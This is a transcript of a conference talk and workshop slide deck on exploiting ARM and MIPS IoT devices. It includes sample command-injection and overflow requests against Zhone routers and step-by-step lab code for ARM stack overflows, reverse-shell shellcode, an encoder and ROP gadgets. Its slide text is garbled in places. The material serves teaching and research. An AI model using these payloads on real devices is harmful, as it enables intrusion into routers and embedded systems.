Lyon Yang

Transcript

1. 0 Practical IoT Exploitation (ARM & MIPS) Lyon Yang /

   @l0Op3r – Vantage Point Security

2. 1 •  Hi everyone my name is Lyon Yang • 

   I hack IoT and embedded systems. •  I live in sunny Singapore. •  Singapore is a smart city with IoT already deployed. •  Taxi drivers in SG will become robots. •  I work at a company called Vantage Point •  Strongest technical team in Singapore/SE Asia. •  Large collective of passionate hackers. •  Working in the financial and government sectors.

3. 2 Today I want to share with you a story:

   1 year ago, I set about to try and become the “corelan” of ARM and MIPS exploitation - a formidable task! I wanted to fully understand embedded systems and try to contribute back into the community. and in the process pop many shells!

4. 3 Who Am I ? •  I am a rather

   regular guy… •  Basic understanding of ASM and exploitation •  Attended some training events myself •  Corelan, HITB, OSCP •  Practice Makes Perfect •  I started buying embedded devices and ‘playing’ •  Working on IoT till 2-3am most mornings.

5. 4 1990s The state of IoT and embedded security. • 

   Equally as immature as the tools. •  “1990 called” - Send our bugs back •  Basic strcpy/memcpy exploits •  Not much privilege separation •  Unsecured host OS •  Backdoors are often ‘vendor features’ •  Not all vendors care about security

6. 5 Attack Surface Attack Surface of IoT •  Think of

   IoT devices as miniature computers •  ARM or MIPS CPU •  “Hard-Drive” is a memory IC •  Runs Linux (typically) •  Communicate over WiFi/Wired •  HTTPD, UnPnP, FTPD, SSHD, TelnetD

7. 6 At Vantage Point I work with IoT vendors within

   SE Asia •  Network Services (httpd/telnetd…) •  Found more stack overflows than you can count •  “Every string was insecurely handled” •  Admin “restricted” Shells command1 | sh sh dumpmem/readmem

8. 7 Bugs •  Backdoor User(s) •  Security Implemented in Client

   Side •  Debug interfaces left active •  File Upload -> Shell •  Arbitrary File Read (../../../../) •  Command Injection •  Stack Overflows •  Unauthorized Remote Access via UPnP

9. 8 Developers typically modify open source software •  Customized to

   meet their own needs. •  MicroHTTPD, BusyBox. •  This requires you are a strong C, C++ Developer •  Most developers now-a-days, are not so strong. •  Customizations exactly where we find bugs. •  Stack Overflows in vendor modifications •  Additional File Handlers or HTTP Methods •  Authentication •  Password Reset •  Log File Access

10. 9 ZHONE Zhone Technologies is a Global Leader in Fiber

    Access Transformation for Service Provider and Enterprise Networks! •  Based in the US Reference  from  zhone.com  

11. 10 Telcos using Zhone Routers Reference from Shodan

12. 11 Privilege Escalation CVE-2014-8356 Privilege Escalation via Javascript Controls • 

    Access Control via Javascript! (Horrible!) •  Direct Object Reference to administrative functions!

13. 12 Plaintext Passwords All username and passwords usually found in

    the backup settings file! CVE-2014-8537 – Exposed Plaintext Username & Passwords •  Passwords found to be BASE64 encoded in backup settings file. GET /backupsettings.conf? action=getConfig&sessionKey=

14. 13 Command Injection (Telnetd) CVE-­‐2014-­‐9118    Command  Injec;on  via  the

     telnetd  session   #  download-­‐sw  “Dp://123:213@213/;ls  -­‐la”  

15. 14 Command Injection (HTTPD) Favourite way to look for Command

    Injection via IDA Pro: Search for keyword “shell” in IDA PRO: Sample  Exploit:   /zhnping.cmd? &test=traceroute&sessionKey=985703201&ipA ddr=192.168.1.1|wget%20h5p:// 192.168.1.17/shell%20-­‐O%20/tmp/ shell&Wl=30&wait=3&queries=3  

16. 15 \x41\x41\x41\x41 GET /.htmlAAAAA…(7000 ‘A’)…AAAA.html POST /.tst HTTP/1.1 Host: 192.168.1.1

    AAAA…..AAAA (7000 Characters)

17. 16 Stack Executable Stack  commonly  found  to  be  executable  

18. 17 •  ASLR •  Bad Characters •  Auto-Killing Process Monitoring

    •  Cache Incoherency Common Exploit Writing Issues

19. 18 Cache Incoherency Reference:   hWp://community.arm.com/groups/processors/blog/2010/02/17/caches-­‐and-­‐self-­‐modifying-­‐code  

20. 19 Cache Incoherency •  Self-modifying code (Encoder/Decoder) would commonly cause

    Cache Incoherency •  Instructions stored in Instruction Cache will execute instead of Data Cache •  Modified Shellcode is stored in Data Cache and will not execute Reference:   hWp://community.arm.com/groups/processors/blog/2010/02/17/caches-­‐and-­‐self-­‐modifying-­‐code    

21. 20 Overcome Cache Incoherency •  Flush the cache. •  Encode

    and decode only the data portion of the shellcode. Data is not considered as Instructions!

22. 21 Decoding Data Decoder   Shellcode   (Instruc;ons)   Shellcode

      (Encoded  Data)   Decode   Read  Data   Shellcode   (Decoded  Data)   Instruc;on  Cache   Data  Cache  

23. 22 MIPS Exploit Writing Clear Cache à  Use ROP Gadget

    to clear cache ASLR à  Use ROP Gadget to jump to Stack Bad Characters à  Wrote your own encoder Auto-Respawn Process Monitoring à Fork the Shellcode Process

24. 23 0-Day Demo DEMO

25. 24 ARMEncoder ARMCoder (Alpha Stage) Ultimate tool to crafting your

    shellcode •  Mthumb encoder (Encodes all or part of your ARM Shellcodes) •  Provides you with an encoder •  Objdump your shellcode binary to specific formats like C: "\x41\x42\x43\x44” Upcoming features •  Detects for bad characters •  32bit encoder •  Generates Shellcode •  Accept other forms of shellcode input. (Currently only supports reading from binary) •  Added support for MIPS Architecture Download Link: https://github.com/l0Op3r/ARMCoder

26. 25 ARM Exploitation Workshop •  Triggering stack overflows to ARM

    shell. •  Learn ASLR bypass with ROP the ARM way •  Learn briefly how to read shellcode for the ARM architecture •  Get your shiny Hash Prompt!

27. 26 Required Setup Requires: Kali with Python SSID: random2 Password:

    iotvillage! (small caps) Credentials on the piece of paper. ssh <userid>@192.168.1.<ip>

28. 27 Setup Step 1: Download materials on your client wget

    http://192.168.1.1:8000/materials.tar wget http://192.168.1.1:8000/lyonslides.pdf Step 2: Extract materials tar –xvf materials.tar Use any of the assigned ports to listen on from the server. Port <As Assigned>

29. 28 What are we hacking? Buffer overflow in two applications:

    •  Simple Bufferoverflow without ASLR ~/materials/server/practicelab1/httpdserver •  Bufferoverflow with ASLR Hint use ROP Gadgets from binary “server” ~/materials/server/practicelab2/server

30. 29 StackOverflow \x41\x41\x41\x41 What is a Stack Overflow? Program tries

    to use more memory space than the call stack has available. Register  PC     (Program  Counter)   Register  SP   (Stack  Pointer)   AAAAAA AAAAAA AAAAAA AAAA\n   Saved  $PC   Strcpy()   writes   this  way  

31. 30 Running Server with GDB On Server: 1.  cd /home/hacker1/materials/server/practice_lab1/

    ./httpdserver < Any port you are assigned to> 2.  Example: Enter: ./httpdserver 10000 & 3.  Output: [2324] ß Process ID 4.  gdb attach <PID> Example: gdb attach 2324 5.  Press continue in gdb: c

32. 31

33. 32 Running Exploit Python script sends 950 ‘A’s to server

    On Client (Kali Linux): 1.  cd materials/client/ 2.  python arm_practice_lab_0.py <Assigned Server IP> <Port you run server on> Example: python arm_practice_lab_0.py 192.168.1.4 10000

34. 33 Stack Overflow Triggered

35. 34 We have control over PC  Server:  Type  “info  registers”

     or  “i  r”  in  gdb  

36. 35 Server Server: Re-run httpdserver and attach with gdb Example:

    ./httpdserver <port no> & gdb attach <pid>

37. 36 Register r15/PC What is the program counter (PC) used

    for? Address (Location) of next instruction to be executed. As each instruction gets fetched the program counter increases its value by 2 or 4 Register  PC     (Program  Counter)   Register  SP   (Stack  Pointer)   AAAAAA AAAAAA AAAAAA AAAA\n   AAAA   Strcpy()   writes   this  way   Calculate  Offset     to  $PC  

38. 37 OFFSETS How do we locate the offset to PC?

    Client: •  /usr/share/metasploit-framework/tools/ pattern_create.rb 950

39. 38 OFFSETS Client: In the python script “arm_practice_lab_0.py” modify “buffer”:

    Copy and paste the pattern generated by pattern_create.rb Example: buffer = “aAbB-----yYzZ” Run edited python script: python arm_practice_lab_0.py <Assigned Server IP> <Port you run server on> Answer in: materials/client/answers/arm_practice_lab_1.py

40. 39 Server:   1.  Type  “info  registers”  or  “i  r”

     in  gdb   2.  Copy  address  in  Program  Counter  Register  (PC)   Example:0x72413970                         Getting the pattern offset

41. 40 Locating offset to PC Client: 1. Enter the following

    command: /usr/share/metasploit-framework/tools/pattern_offset.rb <Copied Address> 2. Modify python script to confirm the offset is correct: buffer= 'A'*508 buffer+= 'B'*4 buffer+= ‘C’ * (950 – len(buffer)) Answer  in:  materials/client/answers/arm_pracNce_lab_2.py 3. Run edited python script (On the server remember to Re-­‐run  h5pdserver  and  aWach  with  gdb): python arm_practice_lab_0.py <Assigned Server IP> <Port you run server on>

42. 41 Where to put our shellcode? Server: 1.  Confirm that

    register PC has been overwritten by ‘\x42\x42\x42\x42’ by typing the following in gdb : “i r” 2.  Find out where the stack pointer is pointing to? By typing the following in gdb: “x/8a $sp-4” 3.  Copy the address stored at register $sp address. Example: 0x7efff680

43. 42 Where is $SP pointing to?

44. 43 Add stack location to the script Client: 1.  Modify

    python script to confirm that the PC has jumped to the right location: buffer='A'*508 buffer+='\x80\xf6\xff\x7e' buffer += 'C' * (950-len(buffer)) ßShellcode Answer in: materials/client/answers/ arm_practice_lab_3.py

45. 44 Shellcoding Why learn shellcoding? Lots of shellcodes to be

    used for free online! In Exploit Development, there will be a lot of hoops and obstacles to jump through: -  Modification to shellcode -  Bad Characters

46. 45 Bad Characters! Common Bad Characters: “\x00\x20\x0a” Functions like strcpy()

    terminate after null byte! Common solution: Encode the shellcode!

47. 46 ARM Registers

48. 47 Important ARM Instructions MOV r1, #1 Moving #1 to

    register r1 ADD r1, r2, #3 Adding #3 to Register R2 and moving it to R1 SUB r1, r2, #3 Subtracting #3 from R2 and moving it to R1

49. 48 Important ARM Instructions SVC 1 Service Call – syscall()

    is a small library function that invokes the system call whose assembly language interface has the specified number with the specified arguments. LDR r5, [pc, #4] Load value from Address Location (Register R3 with offset #4) into R5 STR r4, [pc, #4] Take value from register R4 and store it at Address Location (Register R3 with offset #4)

50. 49 Important ARM Instructions Branch (B, BL, BX, BLX, and

    BXJ) instructions Branch like Jump Instructions (JMP) in x86 Example: B R3 http://infocenter.arm.com/help/index.jsp?topic=/ com.arm.doc.dui0204j/Cihfddaf.html

51. 50 SYSCALL Where to find the syscall offset to use?

    # cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep execve #define __NR_execve (__NR_SYSCALL_BASE+ 11) Register r7 is used to store the location of the syscall to execute

52. 51 execve int execve(const char *filename, char *const argv[], char

    *const envp[]); r0 => //bin/sh\n r1 => //bin/sh\n r2 => 0 r7 => 11 (syscall) r0 => 0

53. 52 Sample execve shellcode _start: .code 32 add r3, pc,

    #1 bx r3 ç Switch to "Thumb Mode (16-bit)” .code 16 mov r0, pc ß (We place the address of pc in r0) add r0, #10 ß Add 10 to r0 (point to //bin/sh) str r0, [sp, #4] ß Place it on the stack add r1, sp, #4 ß Copy location of /bin/sh to r1 sub r2, r2, r2 ß “Set r2 to 0” (Null byte free instructions) mov r7, 11 ß syscall execve in r7 svc 1 ß Execute syscall .ascii "//bin/sh\0”

54. 53 Wait for Shell Client: Listen on port 31337: nc

    –lvp 31337

55. 54 Server: 1.  Change to shellcode directory: cd ~/materials/shellcode/ 2. 

    Edit forkshellcode.s to your client IP Address: .short 0x697a .byte 192,168,1,3 ßYour own IP Address .ascii "//bin//sh\0\0" 3.  Compile the shellcode: #as –mthumb –o fork_shellcode.o fork_shellcode.s #ld –o fork_shellcode fork_shellcode.o 4.  Execute the shellcode: ./fork_shellcode

56. 55 A  shell  should  return  on  your  netcat  listener  

       

57. 56 Fork()

58. 57 Fork Shellcode Why Fork()? •  More stable exploit as

    shellcode process is spawned as a new process •  A process that monitors critical services for failure and respawns/kills process. (Commonly found in embedded devices)

59. 58 Pop Shell Exploiting the binary and getting our first

    shell! Python ARMCoder.py –scb <binary> -be

60. 59 Server: 1.  Dump forkshellcode binary in python format: • 

    cd ~/materials/client •  python ARMCoder.py –be –scb ~/materials/ shellcode/fork_shellcode

61. 60 ` Client: 1.  Copy output and paste into python

    script. Replace ‘C’ with shellcode: (May want to edit: materials/client/answers/arm_practice_lab_4.py) buffer+='\x80\xf6\xff\x7e’ buffer+=("\xe2\x8f\x10\x01” "\xe1\x2f\xff\x11” … "\x00\x68\x00\x00") 2.  Listen on port 31337: nc –lvp 31337 3.  Run edited python script: (Remember to Re-run httpdserver and attach with gdb on the server): python arm_practice_lab_0.py <Assigned Server IP> <Port you run server on> 4.  Check for shell on netcat listener

62. 61 Reverse Shell A  shell  should  return  on  your  netcat

     listener      

63. 62 Common Problem What is ASLR? Address space layout randomization

    (ASLR) is a computer security technique involved in protection from buffer overflow attacks. Addresses of Stack and Libraries most of the time randomized!

64. 63 ROPGadgets Return-Oriented Programming (ROP): Attacker uses control of the

    call stack to indirectly execute machine instructions In simple terms, finding and executing machine instructions found in the httpd binary or libraries.

65. 64 Locating the Right ROPGadget 1. Look for a pivot(ROP

    GADGET) to jump to stack Hint: 2. Set and hit Breakpoint in the vulnerable server In GDB: b *0x<address> Tools to use: Johnathan Salwan Tool: ROPGadget.py OBJDUMP–d <binary>

66. 65 ROPGadget Server: 1.  Change to server directory: cd ~/materials/server/practice_lab2

    2.  objdump –d server | grep –B 2 bx

67. 66 ROPGadget Server:     3.  Copy  ROP  Gadget  loca;on

             8714:  e28d600c    add    r6,  sp,  #12          8718:  e12fff16    bx              r6   4.  Run  materials/server/pracNcelab2/server  <Assigned  Port>  and      aWach  to  gdb   3.  In  gdb  set  breakpoint  at  0x8714  and  con;nue:   b  *0x8714   c  

68. 67 ROPGadget Client: 1.  Offset has been calculated and located

    at 520. Modify python script “python arm_practice_lab2_0.py” and add ROP gadget to replace PC: buffer = 'A'*520 buffer += '\x14\x87’ Answer: materials/client/answers2/ arm_practice_lab2_1.py 2.  Run edited python script: python arm_practice_lab2_1.py <Assigned Server IP> <Port you run server on>

69. 68 Breakpoint Server: 1.  Verify that breakpoint 0x8714 hits in

    the gdb session. 2.  Step through code and copy where did the ROP Gadget jump to: •  stepi •  stepi •  x/8a $pc-4

70. 69 Breakpoint

71. 70 Bad Characters! Common Bad Characters: “\x00\x20\x0a” Functions like strcpy()

    terminate after null byte! So what do we normally do? Encode the shellcode!

72. 71 How to use the ARMCoder python ARMCoder.py -scb <Binary>

    -spos <starting offset to encode> -epos <Ending offset to encode> -be (Endianess)

73. 72 ARMCoder Example

74. 73 ARMCoder Example Ending  Pos;on:  80be+2  –  8054  =  6C

     (Hexadecimal),  108  (Decimal)   Star;ng  Pos;on:  80a8  –  8054  =  54  (Hexadecimal),  84  (decimal)    

75. 74 ARMCoder Server: 1.  Change directory to ~/materials/client: cd ~/materials/client

    2.  Encode and dump the fork_shellcode using ARMCoder.py: python ARMCoder.py -scb ../shellcode/ fork_shellcode -be -spos 84 -epos 108

76. 75 ARMCoder

77. 76 Modifying the Client Exploit Client: Modify python script to

    include the output from ARMCoder.py: 1.  Add a NOP for an alignment issue with PC: nop_mthumb = '\xc0\x46’ 2.  Copy the code mthumb code from ARMCoder: mthumbmode = "\x01\x10\x8f\xe2\x11\xff\x2f\xe1” 3.  Copy decoder code from ARMCoder: decoder = "\x49\xf6\x99\x14\xc9\xf6\x99\x14\x4c\x21\x5a \x23\x7d\x46\xee\x58\x66\x40\xee \x50\xc0\x46\x04\x33\x08\x39\x24\x29\xf7\xda”

78. 77 ARMCoder Same  mthumb  code  

79. 78 Client Client: Edit the following python script: materials/client/answers2/arm_practice_lab2_1.py Note:

    Do not copy mthumb code (first two lines of shellcode output by ARMCoder.py). Remove from shellcode: "\x01\x10\x8f\xe2”"\x11\xff\x2f\xe1" mthumb code already added the mthumb code in the initial stage. 1.  Copy shellcode output from ARMCoder into python script: shellcode = ("\x01\x24\xb6\x1b” … "\xf1\x99\x99\x99")

80. 79 Copy Shellcode Copy  This  

81. 80 Server Server: Re-run server and attach with gdb Example:

    ./server <port no> & gdb attach <pid>

82. 81 Modifying the Client Exploit Client: 1.  Add all required

    variables to the buffer in the python script: buffer = mthumbmode + nop_mthumb + decoder +shellcode buffer += 'A'*(520-len(buffer)) buffer += '\x14\x87’ s.send(buffer) 2.  Listen on port 31337: nc –lvp 31337 3.  Run edited python script: python arm_practice_lab2_2.py <Assigned Server IP> <Port you run server on>

83. 82 Final Exploit

84. 83 NOPS Why  Add  a  NOP?  

85. 84 Register PC Alignment Problem Why add a NOP?! Ran

    through debugger, Shellcode decoded correctly but shell does not return! Program Counter often adjusts its offsets automatically

86. 85 PC auto alignment

87. 86 Awesome References! •  Craig Heffner http://www.devttys0.com/ •  Johnathan Salwan

    http://shell-storm.org/

88. 87 Special Thanks Bernhard Mueller Paul Craig Stefan Streichsbier Roberto

    Suggi Liverani Han Lee Ryan Baxendale

89. 88 Contact Me Email: [email protected] Twitter/Github: @l0Op3r